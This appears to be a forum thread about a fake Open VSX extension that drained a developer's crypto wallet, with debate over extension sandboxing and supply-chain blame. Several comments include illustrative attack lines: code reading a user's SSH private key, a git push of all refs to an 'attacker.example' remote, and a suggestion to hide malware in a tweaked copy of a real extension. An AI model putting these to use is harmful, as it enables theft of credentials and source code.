Am I understanding right that the extension was free to download code from the internet and execute it with enough rights to scan the user's disk? That is wild. Does this mean every company is one bad extension install away from having its entire codebase stolen, or worse?
I naively assumed the extensions were 'sandboxed' to some degree.
I also naively thought that IDE extensions were sandboxed, until I started making extensions myself.
Well, they absolutely are not, and an extension can access the full filesystem. Which is handy if you are legit, but it's very permissive and a much bigger security threat than I imagined.
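To make that concrete: an extension's entry point is just Node code running with your user's privileges. A minimal sketch (the file path is hypothetical, and this isn't from the incident in the article):

    // extension.ts -- the VS Code extension host is plain Node, no sandbox
    import * as fs from 'fs';
    import * as os from 'os';
    import * as path from 'path';

    export function activate() {
      // An extension can read anything your user can read...
      const key = fs.readFileSync(path.join(os.homedir(), '.ssh', 'id_rsa'), 'utf8');
      // ...and nothing stops it from POSTing that to a server the author controls.
      void key;
    }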
VSCode on macOS asks me if it can access my Downloads/Documents/etc. folders... and whether I trust the files in directory X that I just opened. Yet extensions can just bypass all those safeguards?
I believe extensions inherit the permissions the editor already has - so if you've given Cursor or VS Code permission to access a folder, any extension they run later can access it too.
I agree, this seems bad! Sandboxing is still a very weakly implemented craft for most applications, especially those that run extensions or plugins.
(I build a lot of software that runs plugins and has no sandboxing at all, and it really frustrates me. I'm constantly looking out for cross-platform Python-friendly sandboxing tech that might help with this in the future.)
I'm monitoring this area as well. You've probably run across these already, but Extism, a polyglot plugin framework, can be hosted in Python [1] and has evolving support for writing plugins in Python [2]. Another option is container2wasm [3].
I actually tried running clickhouse in container2wasm and it crashed because it only had one CPU core, so YMMV—although that shouldn’t be a problem for Python (or any code custom built for your plugin framework).
For me, I want to avoid separate processes. I definitely want to avoid separate VMs.
> Sandboxing is still a very weakly implemented craft for most applications
Voice of decades past -- sandboxing is very well known and deeply implemented in many aspects of ordinary daily computing; sandboxing is also endlessly difficult and easy to misapply; and people who want to break into things, steal, and wreak havoc ruin software environments for everyone else.
Definitely install something like Little Snitch and keep an eye on the requests that come out of VS Code.
I've become very paranoid about extensions as of late. It's great that LLMs have gotten so good at banging out personal tools; I am using a few home-grown extensions in my own setup.
Even with just internet access, an extension could upload your entire codebase. Git extensions, for example, need this level of access by design. How else could you set a different remote and push all refs? :)
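To spell that out, here's a sketch (the remote name and URL are made up) of how little it takes once an extension can run git:

    # Illustration only: the same commands a legitimate git extension
    # runs every day are enough to exfiltrate an entire repository.
    git remote add exfil https://attacker.example/loot.git   # hypothetical server
    git push exfil --all    # every branch
    git push exfil --tags   # every tag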
These systems rely on downloading and executing much more untrusted software than you could ever imagine. Please dig deeper into this for yourself, I think that's the only way for anyone to truly appreciate the mess we are getting ourselves into.
This is the allure of shipping software with Electron; you get to use your familiar webdev platform, but with all those pesky security constraints gone. I mean, why else wouldn't you just have people use a web page? (OK, you also get easier access to the Start menu.)
As a developer of an Electron application myself, I'd say it's accurate to describe Electron as a Node.js application with APIs for interacting with instances of web renderers, which themselves use a fork of Chromium to render HTML content.
Supply chain attacks really worry me. I do most of my work in docker containers partly as a small attempt to mitigate this. I run the full stack in the container, including Claude Code, Neovim, Postgres, etc.
I do have a fair number of Neovim plugins on my host machine, and a number of Arch packages that I probably could do without.
I’ve considered keeping my host’s Neovim vanilla, but telescope is hard to live without.
Supply chain attacks mean you need to trust your choice of suppliers, trust their security posture and choice of suppliers, and so on. Even Docker itself has FROM lines and often a few "apt-get" (or similar) commands to build the image. Even with no file access, they can exfiltrate data.
Between this, MCP, IoT-all-the-things, vibe coding, AI impersonation for social-engineering attacks, and cryptocurrency as the reward, it's a golden age for criminal hackers!
You can say the same about the vast majority of distribution methods we have. There's no difference between `curl | sh` and executing a binary you download from the internet.
Checksums and signatures make it slightly better. At least you can't go from OK to vulnerable by downloading the same thing you got an hour ago. But if you upgrade, then yeah.
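Verifying before running is cheap, for what it's worth; a minimal sketch (the filenames are examples):

    # Verify a downloaded artifact against its published checksum and signature
    sha256sum -c tool-1.2.3.tar.gz.sha256                  # compare against the recorded hash
    gpg --verify tool-1.2.3.tar.gz.asc tool-1.2.3.tar.gz   # check the maintainer's signature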
The number of dependencies that require inordinate amounts of effort to build from a clean repository without network access is truly alarming. Even many core tools can't be bootstrapped (at least easily or in a manner supported by the developers) without downloading opaque binary blobs. It's like the entire software ecosystem is underpinned by sketchy characters hanging out in dark alleys who clandestinely slip you the required binaries if you ask nicely.
Same worries and setup here, with the only difference that I use Nix to either spawn a QEMU VM or build an LXC container that runs on a Chromebook (through Crostini).
I started using throwaway environments, one per project. I try keeping the stuff installed in the host OS to the bare minimum.
For the things I need to run on the host, I try to heavily sandbox them (mostly through the opaque macOS sandbox) so that they cannot access the network and can only access a whitelist of directories. Sandboxing is painful and requires trial and error, so I wish there were a better (UX-wise) way to do it.
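For anyone curious, here's roughly what that looks like with the officially deprecated but still functional sandbox-exec. The profile is a sketch (paths are examples), and a deny-by-default policy will break things in surprising ways until you iterate on it - hence the trial and error:

    # Sketch: deny by default, whitelist one project tree, block the network.
    cat > dev.sb <<'EOF'
    (version 1)
    (deny default)
    (allow process-fork)
    (allow process-exec)
    (allow file-read* (subpath "/usr/lib") (subpath "/System"))
    (allow file-read* file-write* (subpath "/Users/me/projects/myapp"))
    (deny network*)
    EOF
    sandbox-exec -f dev.sb ./some-tool   # run the tool under the profile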
Do you use devcontainers or a custom-built solution? Would you mind sharing how you do your dev work using containers? I've been looking to try it out, and this attack might be the tipping point to where I actually do that.
Custom. I have a little script: “dev sh” which creates a new container for whatever folder I’m in. The container has full access to that folder, but nothing else. If there’s a .podman/env file, the script uses that to configure things like ports, etc.
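The core of it is something like this (simplified here, and the default image is just a placeholder):

    #!/bin/sh
    # dev sh -- throwaway container that can only see the current folder
    set -eu

    IMAGE="${DEV_IMAGE:-docker.io/library/debian:stable}"   # overridable default
    EXTRA_ARGS=""

    # Optional per-project config (ports, image, env) lives in .podman/env
    [ -f .podman/env ] && . ./.podman/env

    exec podman run --rm -it \
      -v "$PWD":/work \
      -w /work \
      $EXTRA_ARGS \
      "$IMAGE" /bin/bash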
From what I saw of devcontainers, they basically grant access to your entire system (.ssh, etc). May be wrong. That’s my recollection, though.
And yet, this entire class of abuse is only possible because Microsoft refuses to implement any kind of permission management or sandboxing for extensions.
If the team put those filters in place, then it was the team. Anyone implementing automation gets to be held responsible for its failure, but also its successes.
Unfortunately, the marketplace ecosystem is why I went back to VS Code from Cursor. I'm a bit upset by this: I don't appreciate that Microsoft keeps the marketplace a closed ecosystem and won't open it to Cursor, but the reality is that Open VSX doesn't have all the extensions and does little vetting.
Well this was an extremely unsophisticated attack. The malware wasn't hidden and they didn't even bother to actually copy the real extension.
If I were doing this I would copy the real extension, give it a name that made it sound official but in the README say it is a tweaked version with some improvements or whatever. Also actually add some improvements, but hide the malware in those changes.
Downloading random code from the internet is just normal development on a Mac. Brew, npm, and other sorts of "package managers".
I have code, passwords, and certificates separated into virtual machines; even the IDE GUI app is virtualized and has no rights to access GitHub, the internet, or the filesystem directly.
But I get a lot of flak from coworkers. They say it's unintuitive and that it uses an x86 CPU, which is uncool. The Mac has no reasonable VM software or secure containers!
There's actually a new setting in VS Code (from December 2024) to configure a whitelist of extensions that are allowed to be installed on a user's machine [0]. It's not foolproof, but it probably helps prevent common supply chain attacks. I wonder if this could be used in Cursor too.
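For reference, the setting is `extensions.allowed`; in settings.json it looks something like this (the IDs below are examples, not recommendations):

    {
      // Only extensions matched here can be installed; everything else is blocked.
      "extensions.allowed": {
        "ms-python.python": true,       // allow one specific extension
        "dbaeumer.vscode-eslint": true,
        "some-publisher": false         // block an entire publisher
      }
    }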
This incident really underscores how AI-powered dev tools, which rely on open-source extension registries like Open VSX, can be weaponized via supply chain abuse. A $500k crypto heist via a bogus “syntax highlighter” signals a scary maturity in these attacks.
Ranking manipulation, using recency and inflated download counts, to outrank the legitimate Solidity package is a clever exploit of how developers search. It makes me wonder: should IDEs start validating package authorship or offer signed extensions as a default?
Also, the fact that this happened on a freshly imaged system with no antivirus suggests we need to rethink trust models for extension marketplaces. Not just for crypto devs, but for any industry sensitive to code integrity.
We're getting back to the old age of antivirus software. Can't wait to install Norton or Kaspersky on my Mac M5. Also good time to start your antivirus ai startup.
That's why I always develop in a per-customer mini VM via VS Code SSH remoting or similar, and projects are usually run via docker-compose or devcontainers.
But this is not about Cursor. It's a supply chain attack, and a Windows machine running a software wallet. A hardware wallet would make this impossible.
According to Wikipedia: organisations with roots in the Soviet Union, the Donetsk People's Republic, white supremacist websites, and cybercrime. So you can probably safely block it unless you're into those kinds of things.
EDIT: also students' unions apparently, which kinda makes sense
Somewhat humorously, my company displayed an IT warning telling me that I can't visit the website in question because it's in Russia. I probably set off some kind of alarm somewhere.
I do use Cursor at work and I have various extensions installed.
I'm always anxious when I download npm packages or pip-install Python packages... tbh it's a gamble, because there are so many supply chain attacks and/or malicious developers.
Wrong: bash scripts can pop up a series of permission prompts on macOS if you do a full disk scan. They're only suppressed when run directly from an application like Terminal that has already been given Full Disk Access or Developer Tools permission. In fact, sometimes the syscall just silently fails with no permission popup. For instance, I have a Python script calling an HTTP endpoint on the LAN that, when run within tmux, would sometimes inexplicably fail with a "no route to host" error because it doesn't have the local-network permission; there's no permission prompt, and the only solution is to restart the tmux server.
Not in my case. I only give Terminal and iTerm the "Developer Tools" permission. Cursor shows up under "Full Disk Access" with a toggle, so it may have requested the permission at some point, but I keep it disabled; I don't see why it needs to reach outside the directories I actively open. (And VS Code, which I used for years, doesn't even show up there.)
Disclaimer: I’m not sure whether Cursor inherits iTerm’s permissions when launched from CLI. The TCC system is pretty mysterious to me in general.
You know you are in a cycle when some new software/paradigm brings new solutions and approaches while it forgets about basic stuff already implemented for ages by prior solutions. It's basically like an adolescent.
I guess this is how we evolve?
1. Be aware of remote code downloading and execution. VSC extensions are remote code. Try to find out if you trust the source. I trust Debian repos, I certainly do not trust the VSC marketplace.
2. Know the policies around sandboxing. VSC is not a browser, and does no sandboxing at all.
3. Containerize or virtualize the application. If you're on Linux, always use Flatpak. Deny all filesystem permissions except for your root source code directory. This goes for browsers, too: ideally they should support xdg-download and then have zero file permissions at all; otherwise, only grant ~/Downloads. You don't want a zero-day stealing your files. (A sketch follows after this list.)
4. Keep sensitive data in a separate, encrypted place. On Linux, you can use KDE vaults.
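Re point 3, the Flatpak part looks something like this (the app IDs and the source path are examples):

    # Revoke all host filesystem access, then grant only the source tree.
    flatpak override --user --nofilesystem=host com.visualstudio.code
    flatpak override --user --filesystem=~/src com.visualstudio.code

    # Browser: no static file access; fall back to granting only ~/Downloads.
    flatpak override --user --nofilesystem=host org.mozilla.firefox
    flatpak override --user --filesystem=xdg-download org.mozilla.firefox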
In a perfect world, we wouldn't be downloading and running remote code at all. But in practice, that's untenable: I have JS enabled in my browser. Our best bet is limiting the blast radius when things go south.
Context: Cursor, despite raising $900M, is a VS Code fork that uses the Open VSX extension registry. That registry is maintained by European volunteers at a non-profit, and does not have the resources to check for supply-chain attacks like this.
Freeloading on (and blaming) volunteer infrastructure is irresponsible, especially when you have so much funding.
Cursor, Microsoft, and all the major players in this space should invest heavily in a managed dependency/plugin service, also covering the huge number of Node.js packages. They need a review, scan, certification, and warranty program.
Apple did it 15 years ago, time for the rest to catch up. They can turn it into a business by offering enterprise subscriptions for higher guarantees or a warranty.
That's the more general issue, isn't it? Users demand software, guarantees, ... and refuse to pay for it.
That goes for the AI industry itself, but equally for everyone using it.
Microsoft won when it found a way to extract software fees as a tax from hardware manufacturers.
FANG won when it found a way to extract software writing and hosting fees from advertisers, effectively making it a tax on everything you buy.
Both of these (operating systems and basic cloud services like email hosting) could be done a lot cheaper if they were paid for by end users, but those just won't pay. In fact, for a while they were paid for by end users (Microsoft did that, gmx.net, infomaniak, ...). Then everyone switched to "free" and here we are.
And we all know there's no way back, so what's the point discussing it? We all know most people would just not have email or web search if they had to pay even $5 per year for it, and I seem to recall an article stating Google effectively earns over $100 per year per account.
Reality is: give it another 2 years and the "art, music, articles, newspapers, books and open source code" industries will reach absolutely nobody except through AI providers. That could be avoided if every creator paid $1 per year to have free infrastructure for their services, but there's no way in hell they will do that ... so here we are. In 2 years instead they'll pay $1000 every time they want someone to actually look at their art.
And yet, the situation with banking services is far worse, imho. So bad, in fact, that even charging $0.01 per year for internet services would be a nonstarter.
Nonetheless, I think this is more a vulnerability on the Open VSX registry side than in Cursor AI. If anything, the forks and VS Code should block/sandbox extensions by default, or have a granular permission system so users can consciously choose whether to allow an extension to use network resources or not.
The title does make it sound like the AI itself led to the vulnerability, which is false.
But Cursor isn't off the hook. It wasn't a malicious copy of the IDE; it was a legit copy of the Cursor IDE distributing a package they allowed on the extension store. This is on them.
The lesson here is to not make a VS Code fork if you aren't able to maintain it the way Microsoft does. Move fast and break (the user's) things, I guess.
The article says they use Open VSX, which is managed by the Eclipse Foundation. It's not really anything to do with Cursor, other than the fact that they give you access to the only other VS Code marketplace, which all the forks use.
The biggest "reveal" here is that open-vsx has far less effective anti-fraud measures than the end users of Cursor, Windsurf, etc. expect.
It seems that an attacker was able to easily manipulate download counts, placing their malicious extension high in search results.
And this is far from the first open-vsx vulnerability in the past month. See: https://blog.koi.security/marketplace-takeover-how-we-couldv... which describes how open-vsx was installing arbitrary packages and running their build scripts in a privileged environment.
With billions of dollars being poured into this ecosystem, it's mind-boggling that security is being treated as such an afterthought. Consider this when choosing tools.
Yes, let's blame the guys working on something for free, instead of the company which raised nearly a billion in VC money but couldn't be bothered to check.
If you run part of the software supply chain ecosystem, put it on the web without any kind of "alpha" or "insecure" language that's highly visible to end users on every package, and even distribute professional white papers and marketing-style landing pages to promote it (e.g. https://outreach.eclipse.foundation/openvsx), yet create a deployment architecture that executes arbitrary third-party code during every deploy (as was the case before https://github.com/EclipseFdn/publish-extensions/pull/881/fi... landed to fix the issue in the link above) - then I do indeed think the Eclipse Foundation bears some responsibility here.
And for sure, Cursor and others should have funded security hardening of their extension marketplace. The lion's share of the blame lies on that. But the Eclipse Foundation is in a position to incentivize that investment by making it clear to end users that open-vsx is still at an experimental level of stability and security, rather than promoting it as an enterprise-ready product with white papers and all.
There are companies that will provide quality guarantees and product liability insurance for open source software (I work for one in fact), so maybe Cursor should have used one of those.
For sure, but the membership fees these companies pay are really quite small (bottom of this page https://www.eclipse.org/membership/prospectus/), and they mainly go towards infrastructure, running the working groups, and conferences. The projects get some benefits, but they don't get a lot of full time developers (in fact, I'd be surprised if they get even a fraction of 1 FTE), and are largely run either by volunteers or by people doing this in their 20% time in regular day jobs.
In any case, Cursor didn't pay any money here, so they get to keep all the pieces when the code they used for free breaks.
I blame my tool, Cursor. They blame their tool, open-vsx. We're either both right about that logic, or both wrong. Either way, I expect consistency in how the product I pay for assigns/accepts blame. Cursor's response will be interesting.
Cursor does bear significant responsibility, in the sense that Open VSX transformed from a niche service used by free-software nerds into a major component of many developers' processes. There were a few months when Cursor were the scrappy upstarts, but now they're a $200M/year company and they have $200M/year responsibilities. They can't just wash their hands of it and pretend Open VSX is a public service.
Why do the goalposts always move in the open source world? It's a public open source service. Speaking purely about this vulnerability: it's an extension listed in the Open VSX ecosystem. Regardless of whether Cursor vetted all of these extensions or not, I would still be incredibly hesitant, like everyone should be.
Now do we need better solutions? Definitely and I do hope cursor will contribute towards it but I won’t hold them to it. They switched to OpenVSX less than a month ago, too soon to really say much at this point.
I didn’t move any goalposts. Cursor set up the goalposts themselves by making a small volunteer-run service a critical component of their massive for-profit product. It’s greedy and irresponsible.
“Open VSX is an open-source registry for VS Code extensions. It can be used by any development environment that supports such extensions.”
Sure sounds like you are moving goalposts around. Of course I hope Cursor contributes back, but it's been 20 days, and since I'm not an insider I have no idea what the plan is.
Most of us haven't read the Linux kernel source. Some of us even use closed operating systems like macOS, Windows, or iOS. So this can't possibly be the right standard.
But it is true that certain types of developers will just download anything and integrate it into their development process. And it's also true that this would have been avoided by executing in a sandbox.
I want people to release cool software without the insane burden you describe. If they want to delegate that burden to users or ask them to pay for someone else to assume the burden, great.
I love Cursor. They haven't failed me. I'm not running arbitrary code and I suffer none of the consequences.
Furthermore, it probably literally says you're running random 3rd party code when you use extensions and Cursor is not liable. This is basic human responsibility 101. You are responsible for your own actions.
This seems like a bad faith argument - the risky tools, yes, actually. I do audit them. Or at least poke around for someone who has.
It is easier than ever to do a DIY malware analysis on the tools you use.
“Hi Claude - you are a security researcher and malware analyst. Analyze the FooBar Chrome Browser extension / git repository I just downloaded for security threats and provide me a report on whether this is OK to use”
I know browser / IDE extensions are not usually audited and approved by the tool owner unless specifically noted otherwise. Even phone apps can sneak stuff in. So I am careful to only install things I trust or will audit myself or am willing to take the risk on.
You can dig in your heels on ideals and principles, but it is simply not realistic to expect a 3rd party extension marketplace from a closed source IDE startup run by 24 year olds in the Valley to protect you from all risk. (By the way, nor is it their goal - they are optimizing for breadth of the ecosystem and adoption and growth, not security and guardrails. That would likely cost you a lot more than $20/month.)
If you can figure out how to moderate a system of 3rd party software (or content, really) to protect the user from all bad things while maintaining global-scale content throughput, I suggest you start a company - I’m sure people will pay a lot of money for your capabilities.
I don't trust random 3rd party extensions. They might be trying to screw me. This is the exact reason why I don't touch npm.
I'm not prescribing a formal set of rules by which you should or shouldn't trust things. I'm just a reasonable person.
Cursor is an unrelated 3rd party to this situation, which is probably clearly described in their Terms of Service. Blaming them reeks of denying responsibility for your own actions. If you want Cursor to audit every 3rd party extension, they'd probably want you to pay them for it. Just like every commercially licensed Linux distro.
You understand that the extension was a copy of a genuine extension?
It was a mistake that he installed the duplicate, fraudulent extension. For all we know, he could have checked the intended extension's code line by line, and then gone on to install the Trojan horse extension by accident.
> The developer was well aware of the cybersecurity risks associated with crypto transactions, so he was vigilant and carefully reviewed his every step while working online.
Tbh it’s literally impossible to use your computer normally and be vigilant enough to protect crypto. No one could ever properly audit everything they run.
That's the reason why Hardware wallets exist. They aren't the panacea, but they drastically increase the separation of your keys from the Internet. Some (like ColdCard) do not ever need to touch an online computer directly.
For small amounts, all these mobile/add-on/desktop wallets are fine (with minimal caution, like avoiding the reckless behavior described in the OP). For larger amounts, cold storage (of which hardware wallets are the easiest to deploy) will protect your funds.
When you put cash in your physical wallet, you accept that it could be lost to a robber in the street, with little to no recourse. You wouldn't put all your belongings in a big bag and carry it everywhere you travel; or if you did, you would increase your security in proportion to the increased risk. If you don't, nobody will shed a tear over your losses.
Not sure how this is different with crypto. I guess people assume everything is safe by default because it has no physical form, despite the 20 warnings and security reminders they get when they set up any crypto wallet.
If you have more than high 5 figures of money lying around, should you be co-mingling it with your everyday activities?
I wouldn't feel particularly comfortable having even 5 figures of tradfi cash lying around in my house, let alone carrying it on my laptop, where someone could steal my bag or machine - and that's before it's even connected to the internet.
In this case it's literally as simple as not developing anything while playing around with a live wallet that has hundreds of thousands of dollars in it.
It's like trying to do vehicle maintenance while your car is running.
It might be technically possible.. but why would you ever do that?